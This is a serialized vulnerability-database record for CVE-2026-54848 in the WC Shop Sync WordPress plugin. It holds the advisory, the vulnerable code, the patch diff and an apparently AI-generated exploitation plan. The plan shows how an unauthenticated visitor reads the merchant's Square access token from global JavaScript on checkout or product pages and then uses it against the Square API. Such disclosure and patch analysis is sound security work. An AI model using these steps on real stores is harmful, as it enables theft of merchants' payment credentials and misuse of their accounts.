[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f3uLBUyFCLEaXOJo9AlsrSHugZIZPnoeknre6QPJsiOw":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":27,"research_verified":28,"research_rounds_completed":29,"research_plan":30,"research_summary":31,"research_vulnerable_code":32,"research_fix_diff":33,"research_exploit_outline":34,"research_model_used":35,"research_started_at":36,"research_completed_at":37,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":28,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":28,"source_links":38},"CVE-2026-54848","wc-shop-sync-square-payment-gateway-and-product-synchronization-for-woocommerce-unauthenticated-information-exposure","WC Shop Sync – Square Payment Gateway and Product Synchronization for WooCommerce \u003C= 4.7.3 - Unauthenticated Information Exposure","The WC Shop Sync – Square Payment Gateway and Product Synchronization for WooCommerce plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.7.3. This makes it possible for unauthenticated attackers to extract sensitive user or configuration data.","woosquare",null,"\u003C=4.7.3","4.7.4","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:L\u002FI:N\u002FA:N","Exposure of Sensitive Information to an Unauthorized Actor","2026-06-18 00:00:00","2026-06-25 13:27:55",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F09406c75-d1ae-4baf-95a1-2c6a492dcf40?source=api-prod",8,[22,23,24,25,26],"admin\u002Fmodules\u002Fsquare-payments\u002Fclass-woosquare-payments.php","admin\u002Fmodules\u002Fsquare-payments\u002Fclass-woosquarepos-gateway.php","admin\u002Fmodules\u002Fsquare-payments\u002Fjs\u002FSquarePaymentsPOSPay.js","readme.txt","woocommerce-square-integration.php","researched",false,3,"# Exploitation Research Plan: CVE-2026-54848 - WC Shop Sync Information Exposure\n\n## 1. Vulnerability Summary\nThe **WC Shop Sync** plugin for WordPress (versions \u003C= 4.7.3) is vulnerable to **Sensitive Information Exposure**. The vulnerability arises because the plugin localizes sensitive Square API credentials—specifically the `access_token` and `location_id`—into global JavaScript variables on the frontend. This makes the credentials accessible to any unauthenticated user visiting the site's checkout or product pages.\n\n## 2. Attack Vector Analysis\n*   **Target Endpoint:** Frontend pages where WooCommerce checkout or product scripts are loaded (e.g., `\u002Fcheckout\u002F` or product pages).\n*   **Vulnerable Mechanism:** The plugin uses `wp_localize_script` to pass configuration data from PHP to JavaScript. It incorrectly includes the Square Access Token in this data.\n*   **Authentication:** None (Unauthenticated).\n*   **Preconditions:**\n    1.  The \"Square Terminal Pay\" or \"Square Payment Gateway\" must be enabled.\n    2.  The plugin must be configured with a Square Access Token.\n    3.  The WooCommerce store must be set to a supported country\u002Fcurrency (e.g., US\u002FUSD).\n\n## 3. Code Flow\n1.  **Initialization:** The `WooSquare_Payments` class constructor (in `class-woosquare-payments.php`) initializes the payment gateways.\n2.  **Gateway Loading:** The `WooSquarePOS_Gateway` class (in `class-woosquarepos-gateway.php`) is instantiated.\n3.  **Script Enqueuing:** The constructor of `WooSquarePOS_Gateway` registers the hook `add_action( 'wp_enqueue_scripts', array( $this, 'payment_scripts_terminalpay' ) );`.\n4.  **Localization (Sink):** In the `payment_scripts_terminalpay` method (inferred from JS usage), the plugin calls `wp_localize_script` to create the `squaretpay_params` and `POSTerminal` objects.\n5.  **Sensitive Data Inclusion:** The PHP code retrieves the token via `get_option( 'woo_square_access_token' . get_transient( 'is_sandbox' ) )` and includes it in the localized array.\n6.  **Exposure:** The browser renders a `\u003Cscript>` block containing the JSON-encoded token, which is then used by `SquarePaymentsPOSPay.js` (e.g., line 103: `token: squaretpay_params.access_token`).\n\n## 4. Nonce Acquisition Strategy\nThis vulnerability is an **Information Exposure** that occurs *before* any AJAX requests are made. The goal is to read the data that would normally be used for authorized requests.\n*   **No Nonce Required:** Accessing the global JS variables does not require a nonce.\n*   **Extraction Method:**\n    1.  Navigate to the `\u002Fcheckout\u002F` page.\n    2.  Use `browser_eval` to extract the sensitive variables from the global `window` object.\n    3.  **Variable Names:**\n        *   `window.squaretpay_params` (contains `access_token`, `location_id`)\n        *   `window.POSTerminal` (contains `access_token`, `location_id`)\n\n## 5. Exploitation Strategy\n### Step 1: Discover Exposed Variables\nAccess the frontend as an unauthenticated user and inspect the JavaScript environment.\n\n**Request:**\n```http\nGET \u002Fcheckout\u002F HTTP\u002F1.1\nHost: localhost\n```\n\n**Action (using `browser_eval`):**\n```javascript\n\u002F\u002F Check for both potential localized objects\nconst leakedData = {\n    squaretpay: window.squaretpay_params,\n    pos: window.POSTerminal\n};\nreturn leakedData;\n```\n\n### Step 2: Extract Credentials\nIf the objects exist, extract the `access_token`.\n\n**Action:**\n```javascript\nreturn window.squaretpay_params?.access_token || \"Token Not Found\";\n```\n\n## 6. Test Data Setup\nTo trigger the exposure, the environment must be configured to load the gateway scripts:\n\n1.  **Configure WooCommerce:**\n    *   Set Store Address to **United States (US)**.\n    *   Set Currency to **US Dollars ($)**.\n2.  **Configure Plugin:**\n    *   Set a dummy Square Access Token: `wp option update woo_square_access_token \"sq0atp-TEST_LEAKED_TOKEN_12345\"`.\n    *   Set a dummy Location ID: `wp option update woo_square_location_id \"LC_987654321\"`.\n    *   Enable the gateway: Update the option `woocommerce_square_terminal_pay_settings` to have `'enabled' => 'yes'`.\n3.  **Ensure Script Loading:**\n    *   Add a product to the cart so the checkout page is accessible.\n    *   `wp post create --post_type=product --post_title=\"Test Product\" --post_status=publish`\n\n## 7. Expected Results\nA successful exploit will return the plain-text Square Access Token and Location ID.\n\n**Example Extracted Data:**\n```json\n{\n  \"access_token\": \"sq0atp-TEST_LEAKED_TOKEN_12345\",\n  \"location_id\": \"LC_987654321\",\n  \"currency_code\": \"USD\"\n}\n```\n\n## 8. Verification Steps\nAfter performing the HTTP\u002FBrowser-based extraction, verify that the extracted token matches the value in the database using WP-CLI:\n\n```bash\n# Verify the token matches the value we found in JS\nwp option get woo_square_access_token\n```\n\n## 9. Alternative Approaches\nIf the checkout page requires items in the cart to load properly, an attacker can look for the same leak on the **Product Page** if \"Express Checkout\" is enabled.\n\n**Logic Check:**\nIn `class-woosquare-payments.php`, the `add_google_pay_button_to_product_page` hook is added if `express_checkout_enabled` is `'yes'`. This often enqueues the same payment scripts, leaking the token on individual product pages.\n\n**Action:**\n1.  Enable Express Checkout in plugin settings.\n2.  Navigate to `\u002Fproduct\u002Ftest-product\u002F`.\n3.  Check `window.squaretpay_params` again.","The WC Shop Sync plugin for WordPress incorrectly exposes sensitive Square API credentials, including the Access Token and Location ID, by localizing them into global JavaScript variables on the frontend. This allows unauthenticated attackers to steal these credentials by simply visiting the site's checkout or product pages and inspecting the JavaScript environment.","\u002F\u002F admin\u002Fmodules\u002Fsquare-payments\u002Fclass-woosquarepos-gateway.php line 294 (payment_scripts_terminalpay method)\n$access_token                = get_option( 'woo_square_access_token' . get_transient( 'is_sandbox' ) );\n$location_id                 = get_option( 'woo_square_location_id' . get_transient( 'is_sandbox' ) );\n\n\u002F\u002F ... line 324\nwp_localize_script(\n    'squaretpay-js',\n    'squaretpay_params',\n    array(\n        'ajax_url'         => admin_url( 'admin-ajax.php' ),\n        'currency_code'    => $currency_cod,\n        'country_code'     => $country_code,\n        'nonce'            => wp_create_nonce( 'squaretpay_params' ),\n        'access_token'     => $access_token,\n        'location_id'      => $location_id,\n        \u002F\u002F ...\n    )\n);\n\n---\n\n\u002F\u002F admin\u002Fmodules\u002Fsquare-payments\u002Fclass-woosquare-payments.php line 435\npublic function funct_terminal_pay_process_checkout() {\n    \u002F\u002F ... nonce verification\n    if ( ! isset( $_GET['token'] ) ) {\n        $token   = sanitize_text_field( wp_unslash( $_GET['token'] ) );\n        $headers = array(\n            'Accept'        => 'application\u002Fjson',\n            'Authorization' => 'Bearer ' . $token,","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwoosquare\u002F4.7.3\u002Fadmin\u002Fmodules\u002Fsquare-payments\u002Fclass-woosquare-payments.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwoosquare\u002F4.7.4\u002Fadmin\u002Fmodules\u002Fsquare-payments\u002Fclass-woosquare-payments.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwoosquare\u002F4.7.3\u002Fadmin\u002Fmodules\u002Fsquare-payments\u002Fclass-woosquare-payments.php\t2026-05-04 09:47:38.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwoosquare\u002F4.7.4\u002Fadmin\u002Fmodules\u002Fsquare-payments\u002Fclass-woosquare-payments.php\t2026-05-22 11:22:46.000000000 +0000\n@@ -422,9 +422,7 @@\n \t * Processes the checkout for a terminal payment using Square's API.\n \t *\n \t * This function retrieves the status of a terminal checkout using Square's API\n-\t * and returns the result in JSON format. It uses the token provided in the GET\n-\t * parameters for authorization and fetches the checkout ID from the WordPress\n-\t * options.\n+\t * and returns the result in JSON format. Uses the stored merchant token server-side only.\n \t *\n \t * @return void\n \t *\u002F\n@@ -432,39 +430,36 @@\n \t\tif ( ! isset( $_GET['square_pay_nonce'] ) || ! wp_verify_nonce( sanitize_text_field( wp_unslash( $_GET['square_pay_nonce'] ) ), 'square-pay-nonce' ) ) {\n \t\t\twp_die( esc_html( __( 'Cheatin&#8217; huh?', 'woosquare-square' ) ) );\n \t\t}\n-\t\tif ( ! isset( $_GET['token'] ) ) {\n-\t\t\t$token   = sanitize_text_field( wp_unslash( $_GET['token'] ) );\n-\t\t\t$headers = array(\n-\t\t\t\t'Accept'        => 'application\u002Fjson',\n-\t\t\t\t'Authorization' => 'Bearer ' . $token,\n-\t\t\t\t'Content-Type'  => 'application\u002Fjson',\n-\t\t\t\t'Cache-Control' => 'no-cache',\n-\t\t\t);\n+\t\t$token   = get_option( 'woo_square_access_token' . get_transient( 'is_sandbox' ) );\n+\t\t$headers = array(\n+\t\t\t'Accept'        => 'application\u002Fjson',\n+\t\t\t'Authorization' => 'Bearer ' . $token,\n+\t\t\t'Content-Type'  => 'application\u002Fjson',\n+\t\t\t'Cache-Control' => 'no-cache',\n+\t\t);\n \n-\t\t\t$checkout_id = get_option( 'terminal_checkout_id' );\n-\t\t\t$url         = 'https:\u002F\u002Fconnect.squareup' . get_transient( 'is_sandbox' ) . '.com\u002Fv2\u002Fterminals\u002Fcheckouts\u002F' . $checkout_id;\n+\t\t$checkout_id = get_option( 'terminal_checkout_id' );\n+\t\t$url         = 'https:\u002F\u002Fconnect.squareup' . get_transient( 'is_sandbox' ) . '.com\u002Fv2\u002Fterminals\u002Fcheckouts\u002F' . $checkout_id;\n \n-\t\t\t$result = json_decode(\n-\t\t\t\twp_remote_retrieve_body(\n-\t\t\t\t\twp_remote_get(\n-\t\t\t\t\t\t$url,\n-\t\t\t\t\t\tarray(\n-\t\t\t\t\t\t\t'method'      => 'GET',\n-\t\t\t\t\t\t\t'headers'     => $headers,\n-\t\t\t\t\t\t\t'httpversion' => '1.0',\n-\t\t\t\t\t\t\t'sslverify'   => false,\n-\t\t\t\t\t\t)\n+\t\t$result = json_decode(\n+\t\t\twp_remote_retrieve_body(\n+\t\t\t\twp_remote_get(\n+\t\t\t\t\t$url,\n+\t\t\t\t\tarray(\n+\t\t\t\t\t\t'method'      => 'GET',\n+\t\t\t\t\t\t'headers'     => $headers,\n+\t\t\t\t\t\t'httpversion' => '1.0',\n+\t\t\t\t\t\t'sslverify'   => false,\n \t\t\t\t\t)\n \t\t\t\t)\n-\t\t\t);\n-\t\t\techo wp_json_encode(\n-\t\t\t\tarray(\n-\t\t\t\t\t'result'      => 'Result_Status',\n-\t\t\t\t\t'result_info' => $result,\n-\t\t\t\t)\n-\t\t\t);\n-\n-\t\t}\n+\t\t);\n+\t\techo wp_json_encode(\n+\t\t\tarray(\n+\t\t\t\t'result'      => 'Result_Status',\n+\t\t\t\t'result_info' => $result,\n+\t\t\t)\n+\t\t);\n \n \t\twp_die();\n \t}\ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwoosquare\u002F4.7.3\u002Fadmin\u002Fmodules\u002Fsquare-payments\u002Fclass-woosquarepos-gateway.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwoosquare\u002F4.7.4\u002Fadmin\u002Fmodules\u002Fsquare-payments\u002Fclass-woosquarepos-gateway.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwoosquare\u002F4.7.3\u002Fadmin\u002Fmodules\u002Fsquare-payments\u002Fclass-woosquarepos-gateway.php\t2026-05-04 09:47:38.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwoosquare\u002F4.7.4\u002Fadmin\u002Fmodules\u002Fsquare-payments\u002Fclass-woosquarepos-gateway.php\t2026-05-22 11:22:46.000000000 +0000\n@@ -328,7 +327,6 @@\n \t\t\t\t'currency_code'    => $currency_cod,\n \t\t\t\t'country_code'     => $country_code,\n \t\t\t\t'nonce'            => wp_create_nonce( 'squaretpay_params' ),\n-\t\t\t\t'access_token'     => $access_token,\n \t\t\t\t'location_id'      => $location_id,\n \t\t\t\t'sandbox'          => get_transient( 'is_sandbox' ),\n \t\t\t\t'square_pay_nonce' => wp_create_nonce( 'square-pay-nonce' ),\n@@ -363,7 +360,6 @@\n \t\t\tarray(\n \t\t\t\t'ajax_url'      => admin_url( 'admin-ajax.php' ),\n \t\t\t\t'nonce'         => wp_create_nonce( 'POSTerminal' ),\n-\t\t\t\t'access_token'  => $access_token,\n \t\t\t\t'currency_code' => $currency_cod,\n \t\t\t\t'currency_sym'  => get_woocommerce_currency_symbol(),\n \t\t\t\t'country_code'  => $country_code,","1. Navigate to the target site's WooCommerce checkout page (\u002Fcheckout\u002F) or any product page where Square payment scripts are loaded as an unauthenticated user.\n2. Open the browser's developer tools and access the JavaScript console.\n3. Type `window.squaretpay_params` or `window.POSTerminal` to view the localized configuration objects.\n4. Extract the `access_token` and `location_id` values from the resulting JSON objects.\n5. These credentials can then be used to make unauthorized requests directly to the Square API on behalf of the merchant.","gemini-3-flash-preview","2026-06-25 21:16:09","2026-06-25 21:17:09",{"type":39,"vulnerable_version":40,"fixed_version":11,"vulnerable_browse":41,"vulnerable_zip":42,"fixed_browse":43,"fixed_zip":44,"all_tags":45},"plugin","4.7.3","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwoosquare\u002Ftags\u002F4.7.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwoosquare.4.7.3.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwoosquare\u002Ftags\u002F4.7.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwoosquare.4.7.4.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwoosquare\u002Ftags"]